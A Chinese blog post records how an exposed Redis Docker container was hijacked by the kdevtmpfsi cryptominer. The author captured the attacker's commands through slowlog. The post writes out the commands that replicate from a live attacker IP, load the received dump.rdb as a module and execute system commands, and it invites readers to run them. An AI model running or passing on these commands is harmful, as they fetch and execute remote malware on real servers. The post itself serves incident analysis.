docker Redis 被挖礦場景復現

lyxxxh發表於2020-03-25

docker redis被任意連結 導致被kdevtmpfsi挖礦記錄

昨天發現伺服器被挖礦了,我ssh可是都沒開的,他是怎麼用我容器挖礦的?

帶這個問題,我把redis容器再次弄成隨意連結,想釣出他執行的命令。

開始追蹤前準備

config set slowlog-log-slower-than 0   //所有命令都會被定義成慢查詢 
config set slowlog-max-len 10000   //保留1w條記錄
config set slowlog-max-len 1000000 //他會不會執行很多命令? 改成保留100w保險些

上鉤了

大概3-4小時,就把我容器做礦機了,真快。

是不是有檢測系統,發現我掉了…

這是redis執行過的所有命令(有部分是我的):
http://cdn.lblog.club/files/redis_log.txt

slowlog格式說明
7    slowlog的id
1585115869   執行的時間戳
15            執行命令的消耗時間 微秒
set            //命令
1            //命令
test        //命令    組合就是set 1 test
127.0.0.1:55968    //客戶端 埠

我得到了他的執行過命令,然後我重新編譯容器,準備復現他的操作。

開始復現

127.0.0.1:6379> slaveof 82.118.17.133 8887    
OK
//此時把他redis資料 同步到受害機  dump.rdb已經是有毒的模組了! 
//可惜dump.rdb用rdb看不了,不知道是什麼操作,不知道這個dump.rdb的內容

127.0.0.1:6379> MODULE LOAD ./dump.rdb      //載入模組
OK

127.0.0.1:6379> system.d id
"" 
(1184.54s)
//獲得成就:主動當礦機 成就加成:cpu+90% 記憶體+10% (使用量)

你在你的redis執行這三條命令, 就可以復現被成為礦機的場景。主動當礦機了

本作品採用《CC 協議》,轉載必須註明作者和本文連結

相關文章